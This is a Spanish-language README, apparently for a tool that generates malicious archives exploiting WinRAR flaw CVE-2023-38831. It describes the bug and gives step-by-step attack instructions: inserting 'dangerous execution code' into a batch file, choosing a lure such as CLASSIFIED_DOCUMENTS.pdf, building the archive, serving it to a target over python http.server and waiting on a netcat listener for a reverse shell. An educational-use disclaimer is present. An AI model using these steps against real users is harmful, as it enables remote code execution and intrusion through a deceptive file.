
Generador de exploits basado en Python para la vulnerabilidad de ejecución de código CVE-2023-38831 de WinRAR. Crea archivos ZIP maliciosos combinando archivos benignos con cargas útiles ejecutables para pruebas de seguridad autorizadas.
⚠️ Solo con fines educativos y de investigación de seguridad autorizados
Muy agradecido al autor original del PoC b1tg y a Group-IB Threat Intelligence
RARLAB WinRAR anterior a la versión 6.23 permite a atacantes ejecutar código arbitrario cuando un usuario intenta ver un archivo benigno dentro de un archivo ZIP.

El problema ocurre porque un archivo ZIP puede incluir un archivo benigno (como un archivo .JPG común) y también una carpeta que tiene el mismo nombre que el archivo benigno, y el contenido de la carpeta (que puede incluir contenido ejecutable) se procesa durante un intento de acceder solo al archivo benigno. Esto fue explotado en la naturaleza entre abril y agosto de 2023.

Primero, modifica el archivo script.bat con tu código de ejecución peligroso
Inserta el archivo señuelo; se recomienda que sea una imagen (.png, jpg) o un documento (.pdf)
Ejecuta el comando para generar el archivo exploit
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
Envía el archivo exploit a la máquina objetivo usando python http.server, por ejemplo:
python -m http.server
Configura el Listener en tu máquina atacante:
nc -nlvp 4444
Descarga y abre el archivo exploit con WinRAR anterior a la versión 6.23